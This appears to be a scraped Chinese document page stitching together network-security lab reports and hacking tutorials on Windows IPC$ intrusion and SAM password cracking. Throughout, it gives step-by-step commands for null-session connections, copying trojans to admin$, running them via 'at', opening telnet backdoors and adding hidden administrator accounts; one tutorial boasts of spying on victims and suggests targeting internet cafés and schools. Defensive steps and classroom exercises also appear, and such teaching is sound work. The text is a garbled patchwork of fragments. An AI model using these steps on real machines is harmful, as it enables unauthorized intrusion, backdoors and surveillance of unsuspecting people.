实训1-3:利用IPC漏洞进行远程攻击
- 格式:ppt
- 大小:971.00 KB
- 文档页数:49
《网络安全与管理》实训报告指导老师:班级:学号:姓名:实训一、Windows口令安全与破译Pwdump导出本地sam散列实验目的1.理解saminside破解本地sam散列的原理。
2.学习psaminside破解本地sam散列的过程。
实验原理1.Windows hash由LM HASH&NT HASH组成。
2.LM HASH生成规则系统中用户密码编码使用了OEM内码页,用户密码被限制为最多14个字符,不足14字节用0补全,并转换为大写。
固定长度的密码分成两个7 byte部分,每部分在末尾加0,组成新的编码。
以上步骤得到的两部分8byte组,分别作为DES key 进行加密。
将加密后的两组进行拼接,就成了LM HASH值。
3.NT HASH生成规则把明文口令从ASCII使用little-endian序转换成Unicode字符,对所获取的Unicode串进行标准MD4单向哈希,无论数据源长度多少字节,MD4固定产生128-bit的哈希值,就得到了NT HASH值。
实验步骤1.打开开始菜单,找到运行输入“cmd”,找到pwdump工具,在cmd中输入pwddump 工具路径。
如下图2.继续在cmd中输入pwdump.exe ,如图进入pwdump界面。
3.然后再输入pwdump.exe --dump-hash-local,获得当前用户的SAM值。
4.右键标记,复制到文本中,保存到桌面上。
5.打开文件夹C:\实验工具集\02主机安全\02_windows口令安全与破解\第三节 saminside破解本地sam散列,打开SAMinside.exe6.导入HASH值文档。
7.选择要破解的账户,点击Audit,选择NT HASH Attack和Dictionary Attack。
8.选择工具下的Opentions。
9.选择Dictionary选项,右边选择Add,添加打开文件夹C:\实验工具集\02主机安全\02_windows口令安全与破解\第三节 saminside破解本地sam散列文件下,Other文件夹下的InsidePro(Mini).dic密码字典。
网络安全实验:系统入侵基本操作-------IPC$漏洞及远程控制实验名称:系统入侵基本操作-------IPC$漏洞及远程控制实验目的:了解一般性系统入侵的基本步骤,理解IPC$漏洞原理,掌握常见扫描工具使用,掌握net命令使用,掌握一般系统防范基本方法。
技术原理:一般入侵步骤:主机扫描----漏洞扫描-----利用漏洞入侵-----操作----留后门----痕迹清除IPC$(Internet Process Connection) 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows (admin$)共享。
空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据WIN2000的访问控制模型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中不包含用户信息对于NT,在默认设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone权限的共享网络命令:参见幻灯片网络命令.ppt远程控制软件:木马属于远程控制软件,被控制端安装服务端程序,控制端安装客户端程序。
常见木马有BO2000,冰河,广外女生,灰鸽子等等。
扫描软件:分为主机扫描,服务扫描,漏洞扫描等。
常用扫描软件:x-scan,supper scan,流光等。
实验环境:网络机房,基本win2000环境,木马软件,扫描软件。
实验步骤:1.安装流光,准备木马(有些木马工具需要生成服务端,但是注意不要执行服务端,否则就安装到自己的机器上了)。
2.对选定网段进行扫描。
确定主机。
(选定网段范围不要过大)3.对存在IPC$漏洞的主机进行连接。
ipc$共享入侵详细教程ipc$共享入侵微软在win2000,xp中设置的这个功能对个人用户来说几乎毫无用处。
反而成了黑客入侵nt架构操作系统的一条便利通道。
如果你的操作系统存在不安全的口令,那就更可怕了。
一条典型的入侵流程如下:(1)用任何办法得到一个帐户与口令(猜测,破解),网上流传有一个叫做smbcrack的软件就是利用ipc$来破解帐户口令的。
如果你的密码位数不高,又很简单,是很容易被破解的。
根据我的个人经验,相当多的人都将administrator的口令设为123,2003,或者干脆不设密码。
(2)使用命令net use \\123.1.1.1\ipc$“密码”/user:“用户名”建立一个有一定权限的ipc$连接。
用copy trojan.exe \\xxx.xxx.xxx.xxx\admin$ 将木马程序的服务器端复制到系统目录下。
(3)用net time \\xxx.xxx.xxx.xxx 命令查看对方操作系统的时间,然后用at \\202.xxx.xxx.xxx 12:00 trojan.exe 让trojan.exe在指定时间运行。
这样一来,你的电脑就完全被黑客控制了。
应对措施:禁用server服务, Task Scheduler服务,去掉网络文件和打印机共享前的对勾(插入图1),当然,给自己的帐户加上强壮的口令才是最关键的。
而且在一般情况下,一些功能对管理员来说也是没有必要的。
如果你不需要MS SQL Server 的xp_cmdshell(use sp_dropextendedproc "xp_cmdshell"这项功能就不要把xp_cmdshell extended stored proc(扩展存储过程)命令功能留着。
我们只需要在isql窗口中输入:use mastersp_dropextendedproc 'xp_cmdshell'net use 映射盘符: \\肉鸡IP\肉鸡盘符譬如:net use z: \\1.1.1.1\c (把对方的c盘映射成你的z盘),察看一下开了哪些端口,有445哦,(主要是针对2000系统的)netstat -an命令:net view(有的机器用的是win98的系统查不出的)看一下自己的IP再看看用户:于是可以进行IPC$连接了(关于IPC$空连接的资料你可以上网搜索一下)命令:net use \\220.160.199.38\ipc$ "" /user:Administrator命令:net use \\ip\ipc$ 密码/user:用户net use \\220.160.199.38\ipc$ "" /user:"zyz"显示命令成功可以用这个命令看下是否成功:net use好了,现在我们给他传个咚咚--我配置好的radmin命令:copy 本地文件远程目录如:copy c:\4899.exe \\192.168.0.200\admin$(这里的$是指admin用户的c:\winnt\system32\)传过去了,我们当然要运行它啊,怎么运行呢?接着看现在我们来看看他机器的时间命令:net time \\192.168.0.200然后用这个命令启动at \\192.168.0.200 时间要运行的文件at \\IP 时间要运行的文件(这个是计划任务里边的一个命令)好了,然后呢,嘿嘿----等!看下我们的后门运行了没有?呵呵,上线了我回头看看是哪个MM or GG?我们看看她在干什么?嘿嘿~OK了吧!至于以后你要做什么,就看你了这个方法还可以入侵网吧的主机,其实内网一般都有这个漏洞特别象学校或网吧等地方我试过了,不过,现在偶不搞他好了,到这里了,防范方法在下边,88!防范ipc$入侵:1.禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》) 首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LS A]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)2.禁止默认共享1)察看本地共享资源运行-cmd-输入net share2)删除共享(每次输入一个)net share ipc$ /deletenet share admin$ /deletenet share c$ /deletenet share d$ /delete(如果有e,f,……可以继续删除)3)停止server服务net stop server /y (重新启动后server服务会重新开启)4)修改注册表运行-regeditserver版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\L anmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
方法一、使用空密码连线现在假设目标电脑的IP地址是202.64.161.X (X为任选数字), 先使用nbtstat 指令查看对方NT的网络数据:nbtstat -A 202.64.161.X如果看到<20 的字样, 那么此NT系统可能将自己电脑数据共享出来。
其实在NT安装后, 会将电脑上的驱动器都共享出来, 没错, 是自动共享出来的! 不过只是隐藏了, 所以你未必会看得见。
而很多人在安装好NT后未做任何设置便即使用, 这正好给黑客一个入侵的大好机会。
随后黑客就会使用Net View 指令看看这个IP 地址:net view \\202.64.161.X正常来说会出现系统发生 System error 5 has occurred 的字样。
这就是NT比Win95/98 安全的地方! 如果是Win95/98 , 只要使用net view 指令就可以看到对方电脑所有共享出来的资源, 如果是NT就一定要登录进入NT服务器才可以用net view 指令。
但黑客并没有对NT服务器的帐户, 又怎样登录呢? 其实NT有一个很大的漏洞, 它有一个ipc$( Inter-Process Communication:进程间通讯 ) , 其同样是隐藏共享, 作为服务器与服务器间的沟通, 只要连接到对方的IPC, 便有机会入侵了。
他会先用null password ( 空密码, 即是没有密码! ) 来试试, 手法如下:net use \\202.64.161.X\ipc$ “ ” /use:“ ”以上的“ ” 是空密码的意思, 如果连接上会看见“指令执行成功”的字样。
接着便再用net view \\202.64.161.X然后便可以看到对方所有共享出来的资源了。
接着黑客会用net use 指令, 把对方共享出来的资源映射成自己的网络驱动器, 之后想怎样用就随心所欲了。
如果对方没有把隐藏共享取消, 黑客可以用以下指令:net use X: \\ip地址\c$那对方的C 盘便会变成自己的X 盘了, 不过这方法未必一定可行, 因为NT服务器安装了Services Pack 3 或以上版本, 用空密码连接IPC$ 的权限被限制, 不能够映射NT上的驱动器 , 这时便要使用下一个方法。
实验五网络入侵实验(一)实验目的学会网络入侵的基本步骤和方法,掌握ipc入侵的原理和防御之策。
(二)实验内容1.利用Xscan软件扫描系统漏洞2.利用ipc$漏洞入侵系统3.对系统实行基本的安全防范(三)实验环境配置在局域网中利用主机1入侵主机4主机4 IP:192.168.1.104,子网掩码:255.225.255.0,操作系统:Windows 2000;主机1 IP:192.168.1.101,子网掩码:255.225.255.0,操作系统:Windows 2000,扫描软件:Xscan;两主机用交换机连接,用ping命令测试两主机的连通性,不通要重接;(四)名词解释及常用命令简介1.ipc$IPC$(Internet Process Connection)是共享“管道”资源,它是为管理员远程管理计算机共享资源时使用,当验证合法用户名和密码时,远程用户可获得相应的资源共享访问限权。
$表示共享。
IPC$的漏洞在于:在获得合法管理员帐号和密码时,系统默认共享主机所有资源,方便管理员的远程管理。
2.Xscan3.3 扫描工具简介Xscan是一款黑客常用到的扫描工具,采用多线程对指定IP地址段进行安全漏洞检测,扫描内容包括:远程操作系统类型及版本,标准端口状态,漏洞,SQL-SERVER、FTP-SERVER、SMTP-SERVER、NT-SERVER 等弱口令用户,并对于一些已知漏洞给出相应的漏洞描述、入侵步骤及安全解决方案。
3.入侵命令① net use建立ipc共享空链接格式:net use \\对方IP\ipc$ "" /user:""用途:建立IPC空链接,用于测试对方主机是否存在共享漏洞。
效果:若提示“命令成功”,表示对方主机存在漏洞,若提示“找不到网径”表示不存在系统漏洞;举例:net use \\192.168.1.11\ipc$ "" /user:""解释:查看192.168.1.11主机是否存在共享漏洞② net use建立ipc共享链接格式:net use \\对方IP\ipc$ "密码" /user:"用户名"用途:用扫描软件破解出对方用户名及密码后进行入侵;举例:net use \\192.168.1.11\ipc$ "123" /user:"Administrator"解释: 以用户名为Administrator,密码为123建立与192.168.1.11的共享连接;③ net use 映射对方磁盘格式:net use x: \\对方IP\c$用途:映射对方IP的c盘到到本地x盘,即可在本机看到对方c盘的全部内容。
网络安全管理课程设计学院:计算机科学与技术学院专业:计算机网络技术姓名: LIU学号:33班级:B1452指导教师:目录一、本地系统密码破解 (1)实验原理: (1)实验步骤: (1)实验小结: (4)二、IPC$管道的利用与远程控制 (4)实验原理及相关知识: (4)实验步骤: (4)实验小结: (7)三、网络信息收集 (7)实验目的和备用知识 (7)Fluxay密码扫描 (8)实验原理: (8)实验步骤: (8)Nmap端口扫描 (10)实验原理: (10)实验步骤: (11)实验小结 (12)四、Windows 口令安全与破解 (13)pwdump导出本地SAM散列 (12)实验原理: (12)实验步骤: (13)LC5破解本地SAM散列 (14)实验原理: (14)实验步骤: (14)saminside破解本地sam散列 (16)实验步骤: (16)实验小结 (17)五、Ipsec VPN (17)实验原理: (17)实验步骤: (19)实验小结: (24)六、SQL注入技术 (25)SQL注入原理-手工注入access数据库 (25)实验原理: (25)实验步骤: (25)SQL注入原理-手工联合查询注入 (28)实验原理: (28)实验步骤: (28)SQL注入原理-数字型注入 (30)实验原理: (30)实验步骤: (30)实验小结: (34)七、实训总结 (35)一本地系统密码破解【实验原理】暴力破解,有时也称为穷举法,是一种针对于密码的破译方法。
这种方法很像数学上的“完全归纳法”并在密码破译方面得到了广泛的应用。
简单来说就是将密码进行逐个推算直到找出真正的密码为止。
比如一个四位并且全部由数字组成其密码共有10000种组合,也就是说最多我们会尝试10000次才能找到真正的密码。
利用这种方法我们可以运用计算机来进行逐个推算,可见破解任何一个密码只是时间问题。
Saminside即通过读取本地帐户的lmhash值,对hash值进行暴力破解的工具。
IPC$入侵:远程磁盘映射IPC$介绍:IPC$是Windows系统特有的一项管理功能,是微软公司为了方便用户使用计算机而设计的,主要用来远程管理计算机的。
但事实上使用这个功能的黑客可以通过建立IPC$连接与远程主机实现通信和控制。
通过IPC$连接的建立,黑客能够做到:1 建立、拷贝、删除远程计算机文件;2 在远程计算机上执行命令。
的缩写,可以理解为“命名管道”资源,它是Windows操作系统提供的一个通信基础,用来在两台计算机进程之间建立通信连接。
而IPC后面的“$”是Windows系统所使用的隐藏符号,因此“IPC$”表示IPC共享,但是是隐藏的共享。
IPC$是Windows NT及Windows 2000/XP/2003特有的一项功能,通过这项功能,一些网络程序的数据交换可以建立在IPC上面,实现远程访问和管理计算机。
打个比方,IPC连接就像是挖好的地道,通信程序就通过这个IPC地道访问目标主机。
默认情况下IPC是共享的,除非手动删除IPC$。
通过IPC$连接,入侵者就能够实现远程控制目标主机。
因此,这种基于IPC的入侵也常常被简称为IPC入侵。
操作系统(不包括Windows 98系列)在安装完成后,自动设置共享的目录为:C盘、D盘、E盘、ADMIN目录(C:\WINNT\)等,即为ADMIN$、C$、D$、E$等等,但要注意,这些共享是隐藏的,只有管理员能够对他们进行远程操作。
演示:在MS-DOS中键入“net share”命令来查看本机共享资源。
如何消除默认共享?DOS命令,这些都是DOS中经常使用的命令。
DIR命令:列出当前路径下的文件,常常用来查看想要找的文件是否在该路径下。
CD命令:进入指定的目录。
比如,想进入E盘中的CODE文件夹,则在E:\>下键入“CD CODE”命令。
:系统账号类操作;net localgroup:系统组操作net use:远程连接、映射操作net send:信使命令net time:查看远程主机系统时间cls命令:清屏命令。
IPC$空连接主机的攻击技巧来源:115软件站IPC$的定义:IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要。
在远程管理计算机和查看计算机的共享资源时使用。
IPC$的作用:利用IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得到目标主机上的用户列表。
2:这步要使用NET命令,如果你不懂的话建议你快学,NET可是非常强大的命令!(本人正在苦练中)如果你不懂的话就跟着我做吧。
3:如果知道了对方的用户名和密码就用下面这个命令:net use\\127.0.0.1\ipc$"密码"/user:"用户名"退出的命令是:net use\\127.0.0.1\ipc$/delte相信能知道对方用户名和密码的情况不多,详细说明就不写了,写出进入和退出命令仅供大家拿朋友的机子做做试验,熟悉一下界面4:大部分情况下我们都不知道对方机子的用户名和密码。
查他IP用ping命令,格式为:ping(空格)(如果用QQ聊天更简单,现在有QQ显IP补丁,IP一目了然),用追捕查他的操作系统,用户名等。
现在信息都有了,然后大家试试弱智点的密码,如:123,12345,123456,用户名。
运气好的话就可以进入了:)你懒得作字典的话我还有一篇《弱智密码集DIC》,可以去看看:)5:实在猜不出密码的话我们只有祭上榕哥的大作--流光!运行探测--扫描POP3/FTP/NT/SQL主机,会出现“主机扫描设置”;在“扫描范围”中分别填写“开始地址”与“结束地址”,这步你可以选择要扫描的IP段,也可以只填某一IP,扫描主机类型”选择“NT/98”,然后开始扫描,有了NT/98的机器了,(如果单扫某一IP,我建议扫描主机类型选ALL,选项选中的内容不要取消)可以看看他的机子是什么颜色的,具体表示看下表:红色:该主机安装了FrontPage扩展。
并没有权限设置。
利用IPC$植入木马实验班级:113801姓名:崔征学号:080223实验环境:本机系统XP 或win7,虚拟机运行XP 或win003。
实验软件:冰河2.2实验目的:掌握这类病毒入侵计算机的基本方法实验内容:Ipc$是windows 操作系统专有的远程管理工具,但由于其在相对应的安全策略上有漏洞,导致在整个windows 中存在巨大的隐患。
本实验就是通过利用Ipc$向目标计算机(windowsXP 或windows2003)植入冰河木马来达到远程控制对方计算机,让大家了解windows 安全策略的重要性。
实验准备:VM 中运行windowsXP 或2003,充当被控制机器,本机充当攻击者,本机准备冰河木马软件,关闭两个机器的防火墙,关闭两个机器的杀毒软件。
配置虚拟机网卡连接到本机的Vnet1 网卡上,配置内外网络畅通,本例内部计算机地址为192.168.242.130。
实验步骤:步骤1:配置VM 计算机的安全策略,使攻击能顺利进行。
这个账户策略中指定administrator 在空白密码时只能进行控制台登陆,如果不关闭这个选项,则Ipc$攻击无法进行。
所以这个策略在我们的计算机上一定要打开!将网络访问:本地账户的共享和安全模式调整为经典模式,这样在登录时可以使用管理员账户获取到最大权限,否则只能以guest 模式运行,导致文件无法上传。
步骤2:在攻击计算机上的命令行方式执行以下命令:注意net 和use,use 和\\中有空格,另一个空格在/user 前。
如果策略只允许控制台登录,攻击将得到上述信息,则攻击失败。
如果策略调整过后,则得到以下信息,表示连接建立成功。
此时,我们将可以直接向默认开放的共享目录上传木马。
如果你想知道机器都开有什么样的默认共享,请使用下述命令查看。
注意:带$的都是系统默认的共享,即使你没有共享!步骤3:向admin$下上传冰河木马主程序g_server.exe注意:本例中冰河木马被放置在攻击机的c:\windows 目录下。
IPC$的远程入侵和防范作者:刘若冰来源:《数字化用户》2013年第08期随着网络信息化的发展,各企业、组织为了实现远程作业需要开启远程访问,随着远程访问的开启,给恶意入侵者提供了机会,增加了内部网络被攻击的危险。
要防止企业内部网络被远程入侵,首先要了解远程入侵是如何实现的,这样才能更有效地防止被恶意用户远程入侵。
远程入侵最常使用的IPC入侵是通过使用Windows系统中默认启动的IPC$共享,来达到侵略主机,获得计算机控制权的入侵。
一、什么是IPC$IPC$(Internet Process Connection)是共享"命名管道"的资源,通过建立IPC$连接与远程主机实现通信和控制。
它是为了让进程间通信而开放的命名管道,只要有用户名和密码就可以对其进行操作,在远程管理计算机和查看计算机的共享资源时使用。
二、IPC$远程侵方法4.关闭自己的139端口,IPC和RPC漏洞存在于此。
“Internet协议(TCP/IP)”的“属性”按钮,打开“高级TCP/IP设置”对话框,单击WINS选项卡,选择“禁用TCP/IP的NETBIOS”按钮,关闭139端口。
(二)永久关闭IPC$和默认共享依赖的服务:lanmanserver即server服务。
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用(三)安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等)。
(四)设置繁琐的用户密码,防止黑客通过IPC$窃取管理密码。
五、总结我们都会习惯性的说IPC$漏洞。
然后实际上,IPC$只是用于方便并实现管理员远程管理的一种开放的网络登陆功能,并不是真正意义上的漏洞。
但是这样会让一些别有用心的恶意入侵者利用IPC$,访问共享资源,导出用户列表,从而达到不可告人的目的。
所以在了解了IPC$入侵的原理之后,一定要对电脑做好防范操作,杜绝黑客利用IPC$入侵的可能性。
[灌水]教你如何利用IPC$漏洞入侵"高手勿进!~新手请进!~"首先我用局网里的一台存在IPC$漏洞的电脑给大家进行一次IPC$经典模式入侵的演示!~看我用X_SCAN扫到了一台开放139端口并且ADMINISTRATOR用户密码为空的电脑!~当然大家也可以用IPCSCAN扫,这样速度会更快!~OK!~下面开始入侵首先和对方建立IPC$连接:net use \\192.168.0.8\ipc\$ "" /user:"administrator"OK!~成功!~新手注意了,这里密码为空,所以"" /user:"administrator"这里我就只打两个引号!~如果对方有密码的话,就需要在引号中输入密码即可!~OK!~现在我们可以用net use x: \\192.168.0.8\c\$来映射对方的硬盘!~看成功了,不过权限是GUEST权限,有复制,粘贴权限!~现在我们可以传一个木马,把他复制到C:\Docum ents and Settings\All Users\「开始」菜单\程序\启动中,如果对方机器从启之后木马会随系统自动启动的!~这个方法由于要等,所以我这里就不演示了!~现在我就直接COPY一个木马到对方的C盘的WINNT\SYSTEM32目录下!~OK,COPY成功!~命令如下:copy d:\muniu \\192.168.0.8\c\$\winnt\system32好!~既然我们已经COPY了木马过去现在我们就要激活这个木马,我们才能完全入侵这台电脑啊!~那要如何远程激活呢?总不可能跑到对方的电脑面前双击运行木马吧!~(呵呵!~)这时候我们通常都用at命令!~at命令的意思是什么呢?at命令是计划任务命令,就是在特定的时候执行某种程序的命令,许多有定时杀毒功能的杀毒软件就是通过这个命令来执行杀毒任务的。
练习题要求:1、用流光软件扫描局域网2、用前面所学的方法对自己虚拟机进行攻击。
练习评分标准:1、流光扫描结果(30分)。
2、攻克自己的虚拟机并远程登录(30分)。
3、成功为其添加隐藏管理员并用管理员登录(30分)。
4、远程关闭虚拟机。
(10分)Ipc$试验步骤1.试验准备工作启动虚拟机并加载windows 2000 porfessional设置虚拟机的IP(IP地址是本地机IP最后一位加50)设置虚拟机的计算机名(如不设置在试验中将会出现“无效句柄”从而使试验无法完成。
)准备木马文件2.解压木马文件在解压之前必须先关闭本地机的安全专家和杀毒软件,防止解压后的木马被删除。
解压D:\tcsp\试验工具中的IPC$攻击工具。
密码为:123解压后将文件拷贝到C盘根目录下。
同时将本地机的shutdown.exe 拷贝到C盘根目录下(c:\windows\system32\shutdown.exe)预攻击阶段3.安装流光软件点击安装Setup_Fluxay5 并进行ipc扫描。
查看扫描结果。
攻击阶段4.用管理员身份与自己的虚拟机建立连接Net use \\ip\ipc$ “”/user: “administrator”5.拷贝木马到虚拟机(为操作简便先将文件拷贝在本地机的c盘根目录下。
)Copy c:\srv.exe \\ip\admin$Copy c:\ntlm.exe \\ip\admin$Copy c:\shutdown.exe \\ip\admin$6.添加计划任务来运行srv.exeAt \\ip时间 srv.exe7.使用99号端口远程登录telnet ip 99 (等到计划任务的时间到后再进行)8.开启23号端口运行ntlm.exe (进入winnt目录)Net start telnet (运行telnet服务)9.使用23号端口登录telnet ip (重新打开一个dos窗口)后攻击阶段10.建立一个用户Net user 用户名(YYT)密码(075328)/add (用户名和密码自己设定) 11.将用户添加到管理员组Net localgroup administrators 用户 /add12.用新用户登录telnet ip (出现“欢迎使用microsoft telnet client”时键入“N”) login:用户名password:密码13.关闭远程计算机Shutdown -s。
《网络信息安全》课程标准一、课程的性质《网络信息安全》课程是计算机网络技术专业的核心课程,其目标是培养学生网络安全维护、网络安全管理的能力,针对当前网络中主流的攻击类型和网络威胁,对企业网络进行安全保障。
本课程的先修课程为计算机网络技术等。
通过学习,学生应达到网络安全工程师任职资格相应的知识与技能要求。
二、课程设计理念1、该课程是依据“计算机网络技术专业人才培养方案”设置的。
在课程的教学设计中,采用了多样化的教学手段和教学方法。
学生除了在课上通过系统化的工作过程教学,掌握网络安全与防护的知识外,可以利用丰富的立体化教学资源进行能力的加强与提升。
同时,学生可以通过顶岗实习与企业实现零距离的接触,通过校园网的维护使得所学知识“学以致用”。
很多同学在教师的帮助下,参与了大量企业网络建设和安全问题的解决项目,并参加各种网络技能大赛,提高自己的职业能力。
课程设计以网络安全管理的职业岗位需求为导向,以职业能力的培养为目标,以先进的职业资格培训体系为指导。
将理论融合在网络安全的攻防实战中,以期实现理论与实践相结合,学习与实操相结合,最终使学生掌握职业资格能力,获得职业资格证书,取得网络安全管理的职业资格,踏上网络安全管理的职业岗位。
2、该门课程的总学时为72。
以基于工作过程的课程开发理念为指导,以职业能力培养和职业素养养成为重点,根据技术领域和职业岗位(群)的任职要求,遵循学生认知规律,将本课程的教学活动分解设计成若干实验项目或工作情景,以具体的项目任务为单位组织教学,以典型实际问题为载体,引出相关专业知识,并通过教学模式设计、教学方法设计、教学手段的灵活运用、教学目标的开放性设计、教学考核方法改革等,使学生在实训过程中加深对专业知识、技能的理解和应用,保证学生专业能力、方法能力和社会能力的全面培养。
3、课程开发思路通过与知名IT企业的合作,讨论研究信息安全专业课程体系的建设。
通过企业的帮助,教师获得了最新的知识和不断更新的技术,并结合企业的培训体系和课程资源,以“网络安全管理”为核心能力,形成了以国际化为标准,满足工作岗位职业能力需求,适合高职高专学生学习特点的课程体系。
IPC$入侵和防范实验一、试验目的:之勘阻及广创作学习使用windows系统自带IPC$有关的的网络管理和控制命令,巩固对所学知识的理解。
二、试验内容:通过使用windows系统自带的IPC$有关的网络管理和控制命令,观看其结果并进行分析,加深对这些工具的理解和灵活运用。
三、试验环境:(1)装置WINDOWS NT 或WINDOWS 2000以上版本的操纵系统。
(2)已开放IPC$共享。
(3)已知远程主机IP地址。
(4)已知远程主机的管理员帐号和密码(IPC$空连接除外)其中远程主机所需条件:1、装置WINDOWS NT 或WINDOWS 2000以上版本的操纵系统。
2、已开放IPC$共享。
3、已启动SERVER服务。
四、试验步调:①启动命令行控制台(虚拟机和当地机)单击“开始”→“运行”,在“运行”对话框中键入:“CMD“命令启动命令行控制台。
②检查IPC$共享是否开放:Cmd——Net share③在虚拟机上建立用户,并把用户加入administators组中Net user 用户名密码 /addNet localgroup administrators 用户名/addNet localgroup adminstrators④建立IPC$连接在命令行提示符下键入如下命令:Net use \\IP地址\ipc$“密码”/user:用户名如:Net use \\IP地址\ipc$“12345”/user:administrator⑤映射网络驱动器成功建立了IPC$连接后,在命令行提示符下键入命令:Net use 当地盘符 \\IP地址\共享名如:Net use z: \\192.168.1.3\c$该命令的执行结果是将目标主机的C盘映射为当地机的z盘。
映射成功后,就可以对目标主机进行操纵和控制了。
⑥COPY文件命令格式:Copy 当地文件的路径\文件名 \\远程主机IP\远程主机文件路径。
如:Copy c:/bake.bat \\192.168.1.3\c$⑦断开IPC$连接在命令行提示符下键入命令:Net use \\IP地址\IPC$/del思考:如果不知道远程主机的用户名和密码,可以连接上远程主机吗?可以实现以上哪些操纵?④留后门(1)打开记事本编写批处理程序建立后门的批处理程序为:Net user sysdoor 12345 /addNet localgroup administrator sysdoor /add其中“Net user sysdoor 12345 /add“命令添加密码为12345的帐号sysdoor。